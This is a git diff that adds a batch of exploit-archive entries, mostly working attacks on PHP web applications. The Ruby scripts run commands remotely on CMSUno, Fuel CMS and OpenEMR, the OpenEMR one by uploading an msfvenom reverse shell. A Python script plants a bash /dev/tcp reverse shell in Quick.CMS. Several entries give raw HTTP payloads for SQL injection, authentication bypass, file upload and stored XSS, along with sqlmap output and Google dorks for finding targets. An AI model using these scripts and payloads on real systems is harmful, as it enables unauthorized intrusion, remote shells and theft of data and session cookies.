@@ -0,0 +1,125 @@
+# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)
+# Google Dorks:
+#   inurl:uno/central.php
+#   inurl:uno/config.php
+#   inurl:uno.php intitle:"CMSUno - Login"
+# Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066
+# Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
+# Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
+# Version: 1.6.1, 1.6.2
+# Tested on: docker image: php:7.4-apache (Debian buster)
+# CVE : CVE-2020-25557 & CVE-2020-25538
+
+# Vulnerabilities
+## Discoverer: Fatih Çelik
+## Discoverer website: https://fatihhcelik.blogspot.com
+## Vulnerability 1:
+##   Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
+##   CVE: CVE-2020-25557
+##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
+## Vulnerability 2:
+##   Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
+##   CVE: CVE-2020-25538
+##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
+
+#!/usr/bin/env ruby
+
+require 'httpclient'
+require 'docopt'
+
+# username = 'cmsuno'
+# password = '654321'
+# root_url = 'http://localhost:5000/'
+# command = 'pwd'
+
+doc = <<~DOCOPT
+  CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
+
+  Usage:
+    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
+    #{__FILE__} -H | --help
+
+  Options:
+    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
+    -u <username>, --user <username>      user name (if not default: cmsuno)
+    -p <password>, --pass <password>      User password (if not default: 654321)
+    -c <cmd>, --command <cmd>             Command to execute on the target
+    -t <tehc>, --technique <tech>         Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
+    --debug                               Display arguments
+    -h, --help                            Show this screen
+
+  Examples:
+    #{__FILE__} -r http://example.org -c id
+    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
+DOCOPT
+
+# Get anti-CSRF token
+def get_unox(client, auth_status)
+  print '[*] Fetching anti-CSRF token: '
+  res = client.get(LOGIN_URL)
+  case auth_status
+  when false
+    regexp = /name="unox" value="([a-f0-9]{32}?)"/
+  when true
+    regexp = /Unox='([a-f0-9]{32}?)'/
+  end
+  token = regexp.match(res.body).captures[0].chomp
+  puts token
+  return token
+end
+
+def login(client, user, pass)
+  data = {
+    'unox' => get_unox(client, false),
+    'user' => user,
+    'pass' => pass,
+  }
+  puts '[*] Logging in'
+  res = client.post(LOGIN_URL, data)
+  return res.body
+end
+
+def exploit(client, user, pass, cmd, tech)
+  payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
+  case tech
+  when 'user'
+    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
+  when 'lang'
+    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
+  else
+    raise 'Wrong exploitation technique argument value'
+  end
+  headers = {
+    'X-Requested-With' => 'XMLHttpRequest'
+  }
+  #client.proxy = 'http://localhost:8080'
+  puts "[*] Starting exploitation, using '#{tech}' param technique"
+  client.post(VULNERABLE_URL, data, headers)
+  # Login again to trigger uno/password.php
+  clnt2 = HTTPClient.new
+  return login(clnt2, user, pass).lines[..-2].join
+end
+
+begin
+  args = Docopt.docopt(doc)
+  pp args if args['--debug']
+
+  username = args['--user'] || 'cmsuno'
+  password = args['--pass'] || '654321'
+  technique = args['--technique'] || 'user'
+  LOGIN_URL = "#{args['--root-url']}/uno.php"
+  VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"
+
+  clnt = HTTPClient.new
+  login(clnt, username, password)
+  output = exploit(clnt, username, password, args['--command'], technique)
+  print '[*] Command output:'
+  case technique
+  when 'user'
+    puts "\n#{output}"
+  when 'lang'
+    puts ' blind RCE, no output with this exploitation technique'
+  end
+rescue Docopt::Exit => e
+  puts e.message
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/49486.rb b/exploits/php/webapps/49486.rb
new file mode 100755
index 000000000..e28ee85e8
--- /dev/null
+++ b/exploits/php/webapps/49486.rb
@@ -0,0 +1,98 @@
+# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)
+# Exploit Author: Alexandre ZANNI
+# Date: 2020-07-16
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
+# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
+# Version: < 5.0.1 (Patch 4)
+# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3
+# References: https://www.exploit-db.com/exploits/48515
+
+#!/usr/bin/env ruby
+
+require 'httpclient'
+require 'docopt'
+
+shell_name = 'shell4.php'
+user = 'openemr_admin'
+password = 'xxxxxx'
+payload = 'php/reverse_php'
+lhost = '10.10.15.201'
+lport = 8888
+
+doc = <<~DOCOPT
+  OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution
+
+  Usage:
+    #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
+    #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
+    #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
+    #{__FILE__} -H | --help
+
+  Options:
+    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
+    -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
+    -u <username>, --user <username>      Username of the admin
+    -p <password>, --password <password>  Password of the admin
+    -m <payload>, --payload <payload>     Metasploit PHP payload
+    -h <host>, --lhost <host>             Reverse shell local host
+    -t <port>, --lport <port>             Reverse shell local port
+    --debug                               Display arguments
+    -H, --help                            Show this screen
+
+  Examples:
+    #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
+    #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
+    #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
+DOCOPT
+
+begin
+  args = Docopt.docopt(doc)
+  pp args if args['--debug']
+  if args['manual']
+    shell_name = File.basename(args['--shell'])
+    shell_path = args['--shell']
+  else
+    shell_name = "tmp#{rand(1000)}.php"
+    shell_path = shell_name
+  end
+  if args['semi-auto']
+    payload = args['--payload']
+  else
+    payload = 'php/reverse_php'
+  end
+  # Authentication data
+  uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default")
+  data_1= {
+    'new_login_session_management' => '1',
+    'authProvider' => 'Default',
+    'authUser' => args['--user'],
+    'clearPass' => args['--password'],
+    'languageChoice' => '1'
+  }
+  # Reverse shell data
+  unless args['manual']
+    puts "[+] Generating the reverse shell payload: #{shell_name}"
+    %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name})
+  end
+  data_2 = {
+    'site' => 'default',
+    'mode' => 'save',
+    'docid' => shell_name,
+    'content' => File.read(shell_path)}
+  uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default")
+  uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}")
+
+  clnt = HTTPClient.new
+
+  puts '[+] Authenticating'
+  clnt.post(uri_1, data_1)
+
+  puts '[+] Uploading the reverse shell'
+  clnt.post(uri_2, data_2)
+
+  puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}"
+  clnt.get(uri_3)
+rescue Docopt::Exit => e
+  puts e.message
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/49487.rb b/exploits/php/webapps/49487.rb
new file mode 100755
index 000000000..445e07719
--- /dev/null
+++ b/exploits/php/webapps/49487.rb
@@ -0,0 +1,51 @@
+# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
+# Exploit Author: Alexandre ZANNI
+# Date: 2020-11-14
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu 16.04
+# CVE : CVE-2018-16763
+# References: https://www.exploit-db.com/exploits/47138
+
+#!/usr/bin/env ruby
+
+require 'httpclient'
+require 'docopt'
+
+# dirty workaround to ignore Max-Age
+# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
+$VERBOSE = nil
+
+doc = <<~DOCOPT
+  Fuel CMS 1.4 - Remote Code Execution
+
+  Usage:
+    #{__FILE__} <url> <cmd>
+    #{__FILE__} -h | --help
+
+  Options:
+    <url>         Root URL (base path) including HTTP scheme, port and root folder
+    <cmd>         The system command to execute
+    -h, --help    Show this screen
+
+  Examples:
+    #{__FILE__} http://example.org id
+    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
+DOCOPT
+
+def exploit(client, root_url, cmd)
+  url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
+
+  res = client.get(url)
+
+  /system(.+?)<div/mx.match(res.body).captures[0].chomp
+end
+
+begin
+  args = Docopt.docopt(doc)
+  clnt = HTTPClient.new
+  puts exploit(clnt, args['<url>'], args['<cmd>'])
+rescue Docopt::Exit => e
+  puts e.message
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/49490.txt b/exploits/php/webapps/49490.txt
new file mode 100644
index 000000000..b52ff47b7
--- /dev/null
+++ b/exploits/php/webapps/49490.txt
@@ -0,0 +1,50 @@
+# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
+# Exploit Author: ABDO10
+# Date : Jan - 28 - 2021
+# Google Dork : inurl:"/wp-content/plugins/super-forms/"
+# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
+# Version : All (<= 4.9.X)
+# data in http request :
+
+POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
+ <=== exploit end point
+Host: localhost
+User-Agent: UserAgent
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------423513681827540048931513055996
+Content-Length: 7058
+Origin: localhost
+Connection: close
+Referer: localhost
+Cookie: 
+
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="accept_file_types"
+
+jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF                        <=======
+inject extension (|PHP4) to validate file to upload
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="max_file_size"
+
+8000000
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="image_library"
+
+0
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="files[]";
+filename="filename.(extension)"    <====   inject code extension (.php4)
+for example
+Content-Type: application/pdf
+
+Evil codes to be uploaded
+
+-----------------------------423513681827540048931513055996--
+
+# Uploaded Malicious File can  be Found in :
+/wp-content/uploads/superforms/2021/01/<id>/filename.php4
+u can get <id> from server reply .
\ No newline at end of file
diff --git a/exploits/php/webapps/49492.txt b/exploits/php/webapps/49492.txt
new file mode 100644
index 000000000..25247c32d
--- /dev/null
+++ b/exploits/php/webapps/49492.txt
@@ -0,0 +1,15 @@
+# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting
+# Exploit Author: LiPeiYi
+# Date: 2020-12-18
+# Vendor Homepage: https://www.bloofox.com/
+# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
+# Version: 0.5.1.0 -.5.2.1
+# Tested on: windows 10
+
+Vulnerable paper: /admin/include/inc_content_articles.php 
+
+Steps to reproduce:
+
+1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side.
+2: Add the new post and then add the payload "payload: <img src=# onerror=alert('xss')>" in "text" parameter and click on save button. Post Saved successfully.
+3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.
\ No newline at end of file
diff --git a/exploits/php/webapps/49493.txt b/exploits/php/webapps/49493.txt
new file mode 100644
index 000000000..07aa68b2d
--- /dev/null
+++ b/exploits/php/webapps/49493.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
+# Date: 2021-01-28
+# Exploit Author: Ruchi Tiwari
+# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: uname
+# Injected Request
+POST /onlinegradingsystem/admin/login.php HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 122
+Origin: http://localhost:8080
+Connection: close
+Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
+Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
+Upgrade-Insecure-Requests: 1
+
+uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=
+
+#Application will load after 20 minutes.
+--------------------------------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49494.py b/exploits/php/webapps/49494.py
new file mode 100755
index 000000000..480274e9a
--- /dev/null
+++ b/exploits/php/webapps/49494.py
@@ -0,0 +1,71 @@
+# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
+# Date: 2020-12-28
+# Exploit Author: mari0x00
+# Vendor Homepage: https://opensolution.org/
+# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
+# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
+# Version: <= 6.7
+# CVE : CVE-2020-35754
+
+#!/usr/bin/python3
+
+import requests
+import sys
+from termcolor import colored
+from time import sleep
+
+print(colored('''###########################################################''',"red"))
+print(colored('''######    Quick.CMS authenticated RCE by mari0x00   #######''',"red"))
+print(colored('''###########################################################''',"red"))
+print("")
+
+if len(sys.argv) != 6:
+    print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red")))
+    print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red")))
+    exit()
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+IP = sys.argv[4]
+PORT = sys.argv[5]
+
+
+#Start session
+s = requests.Session()
+headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
+
+
+#Authenticate
+print((colored("[+] Attempting user login","blue")))
+
+login_data = {
+    "sEmail": username,
+    "sPass": password,
+    "bAcceptLicense": "1",
+    "iAcceptLicense": "true"
+   }
+
+login = s.post(url+"admin.php?p=login", login_data, headers=headers)
+sleep(0.5)
+
+
+#Exploit
+print((colored("[+] Adding shell command","blue")))
+payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //"
+
+shell = {
+    "sOption": "save",
+    "Back_end_only": payload
+}
+
+exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers)
+sleep(1)
+
+#Triggering reverse shell (three times just in case)
+print("")
+print((colored("[+] Triggering the shell. Go nuts!","green")))
+r = s.get(url+"admin.php?p=languages", headers=headers)
+sleep(1)
+r = s.get(url+"admin.php?p=languages", headers=headers)
+sleep(1)
+r = s.get(url+"admin.php?p=languages", headers=headers)
\ No newline at end of file
diff --git a/exploits/php/webapps/49496.txt b/exploits/php/webapps/49496.txt
new file mode 100644
index 000000000..755cefd04
--- /dev/null
+++ b/exploits/php/webapps/49496.txt
@@ -0,0 +1,18 @@
+# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure
+# Date: 1/27/2021
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1430
+# Version: 1.0
+# Tested on: Windows 10
+# CVE: CVE-2021-3337
+
+1. Description:
+This plugin hides thread content until user replies to the thread. The information disclosure is hidden content can be viewed without replying.
+
+2. Proof of Concept:
+
+- Visit a post where content is hidden
+- Click the reply or quote button below
+Thread content will be displayed in the [quote] bracket without needing to reply
\ No newline at end of file
diff --git a/exploits/php/webapps/49497.txt b/exploits/php/webapps/49497.txt
new file mode 100644
index 000000000..9e78899f5
--- /dev/null
+++ b/exploits/php/webapps/49497.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi
+# Exploit Author: Richard Jones
+# Date: 2021-01-26
+# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+POST /chat/login.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 51
+Connection: close
+Referer: http://localhost/chat/index.php?attempt=
+Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl
+Upgrade-Insecure-Requests: 1
+
+username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--
\ No newline at end of file
diff --git a/exploits/php/webapps/49498.txt b/exploits/php/webapps/49498.txt
new file mode 100644
index 000000000..a64b97dcb
--- /dev/null
+++ b/exploits/php/webapps/49498.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting
+# Exploit Author: Richard Jones
+# Date: 2021-01-26
+# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+#Replicates across chat sessions..
+
+
+POST /chat/send_message.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 58
+Origin: http://localhost
+Connection: close
+Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl
+
+msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1
\ No newline at end of file
diff --git a/exploits/php/webapps/49500.txt b/exploits/php/webapps/49500.txt
new file mode 100644
index 000000000..e64cfc594
--- /dev/null
+++ b/exploits/php/webapps/49500.txt
@@ -0,0 +1,17 @@
+# Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting
+# Date: 1/25/2021
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/
+# Version: 1.4
+# Tested on: Windows 10
+
+1. Description:
+This plugin allows users to delete their account. Giving a reason for deleting your account is vulnerable to XSS.
+
+2. Proof of Concept:
+
+- Go to User CP -> Delete Account
+- Input a payload for delete account reason   <script>alert('XSS')</script>
+Payload will execute here.. admin/index.php?module=user-deleteaccount
\ No newline at end of file
diff --git a/exploits/php/webapps/49501.txt b/exploits/php/webapps/49501.txt
new file mode 100644
index 000000000..330025a64
--- /dev/null
+++ b/exploits/php/webapps/49501.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection
+# Google Dork: N/A
+# Date: 29/1/2021
+# Exploit Author: Zeyad Azima
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
+# Version: V1
+# Tested on: Windows
+
+# Identify the vulnerability
+
+1- go to http://localhost/animals.php and click on an animal
+
+2- then add the following payload to the url
+
+payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh
+url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh
+
+If the web server makes you wait 5 seconds then it's vulnerable
+
+
+# Exploit
+
+Now you can exploit it using sqlmap
+
+command: sqlmap -u url --dbs
+
+example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs
+       ___
+       __H__
+ ___ ___[.]_____ ___ ___  {1.4.10.16#dev}
+|_ -| . [.]     | .'| . |
+|___|_  [)]_|_|_|__,|  _|
+      |_|V...       |_|   http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without
+prior mutual consent is illegal. It is the end user's responsibility
+to obey all applicable local, state and federal laws. Developers
+assume no liability and are not responsible for any misuse or damage
+caused by this program
+
+[*] starting @ 23:05:33 /2021-01-29/
+
+[23:05:34] [INFO] resuming back-end DBMS 'mysql'
+[23:05:34] [INFO] testing connection to the target URL
+you have not declared cookie(s), while server wants to set its own
+('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n]
+y
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: anid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND
+'jMXh'='jMXh
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 8 columns
+    Payload: anid=9' UNION ALL SELECT
+NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL--
+-
+---
+[23:05:36] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.3.10, PHP
+back-end DBMS: MySQL >= 5.0.12
+[23:05:36] [INFO] fetching database names
+available databases [6]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] sys
+[*] umspsdb
+[*] zmsdb
+
+[23:05:36] [INFO] fetched data logged to text files under
\ No newline at end of file
diff --git a/exploits/php/webapps/49502.txt b/exploits/php/webapps/49502.txt
new file mode 100644
index 000000000..fd59d5b6a
--- /dev/null
+++ b/exploits/php/webapps/49502.txt
@@ -0,0 +1,82 @@
+# Exploit Title: User Management System 1.0 - 'uid' SQL Injection
+# Google Dork: N/A
+# Date: 29/1/2021
+# Exploit Author: Zeyad Azima
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-management-system-in-php-using-stored-procedure/
+# Version: V1
+# Tested on: Windows
+
+# Identify the vulnerability
+
+1- go to http://localhost/admin/ and login with your account
+
+2- then go to http://localhost/admin/registered-users.php
+
+3- Click edit on any user and then add the following payload to the url
+
+payload: AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
+url: http://localhost/ums-sp/admin/edit-user-profile.php?uid=3%20AND%20(SELECT%205008%20FROM%20(SELECT(SLEEP(5)))zVHT)
+
+If the web server makes you wait 5 seconds then it's vulnerable
+
+
+# Exploit
+
+Now you can exploit it using sqlmap
+
+command: sqlmap -u url --cookies="cookies here" --dbs
+
+example: sqlmap -u http://localhost/admin/edit-user-profile.php?uid=3
+--cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs
+
+        ___
+       __H__
+ ___ ___[,]_____ ___ ___  {1.4.10.16#dev}
+|_ -| . [)]     | .'| . |
+|___|_  [']_|_|_|__,|  _|
+      |_|V...       |_|   http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without
+prior mutual consent is illegal. It is the end user's responsibility
+to obey all applicable local, state and federal laws. Developers
+assume no liability and are not responsible for any misuse or damage
+caused by this program
+
+[*] starting @ 22:55:16 /2021-01-29/
+
+[22:55:16] [INFO] resuming back-end DBMS 'mysql'
+[22:55:16] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: uid (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
+    Payload: uid=(SELECT (CASE WHEN (7929=7929) THEN 3 ELSE (SELECT
+1849 UNION SELECT 3460) END))
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: uid=3 AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
+---
+[22:55:16] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.3.10
+back-end DBMS: MySQL >= 5.0.12
+[22:55:16] [INFO] fetching database names
+[22:55:16] [INFO] fetching number of databases
+[22:55:16] [INFO] resumed: 6
+[22:55:16] [INFO] resumed: mysql
+[22:55:16] [INFO] resumed: information_schema
+[22:55:16] [INFO] resumed: performance_schema
+[22:55:16] [INFO] resumed: sys
+[22:55:16] [INFO] resumed: umspsdb
+[22:55:16] [INFO] resumed: zmsdb
+available databases [6]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] sys
+[*] umspsdb
+[*] zmsdb
+
+[22:55:16] [INFO] fetched data logged to text files under
\ No newline at end of file
diff --git a/exploits/php/webapps/49503.txt b/exploits/php/webapps/49503.txt
new file mode 100644
index 000000000..d1885175e
--- /dev/null
+++ b/exploits/php/webapps/49503.txt
@@ -0,0 +1,82 @@
+# Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection
+# Google Dork: N/A
+# Date: 29/1/2021
+# Exploit Author: Zeyad Azima
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
+# Version: V1
+# Tested on: Windows
+
+# Identify the vulnerability
+
+1- go to http://localhost/index.php and login with your account
+
+2- then go to http://localhost/manage-normal-ticket.php
+
+3- Click view on any ticket. then add the following payload to the url
+
+payload: ' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH
+url: http://localhost/view-normal-ticket.php?viewid=1%27%20AND%20(SELECT%208292%20FROM%20(SELECT(SLEEP(5)))XIQB)%20AND%20%27QCDH%27=%27QCDH
+
+If the web server makes you wait 5 seconds then it's vulnerable
+
+
+# Exploit
+
+Now you can exploit it using sqlmap
+
+command: sqlmap -u url --cookies="cookies here" --dbs
+
+example: sqlmap -u http://localhost/view-normal-ticket.php?viewid=1
+--cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs
+
+        ___
+       __H__
+ ___ ___[)]_____ ___ ___  {1.4.10.16#dev}
+|_ -| . [)]     | .'| . |
+|___|_  [.]_|_|_|__,|  _|
+      |_|V...       |_|   http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without
+prior mutual consent is illegal. It is the end user's responsibility
+to obey all applicable local, state and federal laws. Developers
+assume no liability and are not responsible for any misuse or damage
+caused by this program
+
+[*] starting @ 23:19:33 /2021-01-29/
+
+[23:19:34] [INFO] resuming back-end DBMS 'mysql'
+[23:19:34] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: viewid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: viewid=1' AND 5743=5743 AND 'wcUF'='wcUF
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: viewid=1' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB)
+AND 'QCDH'='QCDH
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 7 columns
+    Payload: viewid=1' UNION ALL SELECT
+NULL,NULL,NULL,CONCAT(0x716a767a71,0x6f5367494d7573444b726d466e617a77735574536d49466a654d6569746b4972745556686a4e4548,0x716a767671),NULL,NULL,NULL--
+-
+---
+[23:19:34] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.3.10
+back-end DBMS: MySQL >= 5.0.12
+[23:19:34] [INFO] fetching database names
+available databases [8]:
+[*] detsdb
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] ptmsdb
+[*] sys
+[*] umspsdb
+[*] zmsdb
+
+[23:19:34] [INFO] fetched data logged to text files under
\ No newline at end of file
diff --git a/exploits/php/webapps/49504.txt b/exploits/php/webapps/49504.txt
new file mode 100644
index 000000000..07202e363
--- /dev/null
+++ b/exploits/php/webapps/49504.txt
@@ -0,0 +1,15 @@
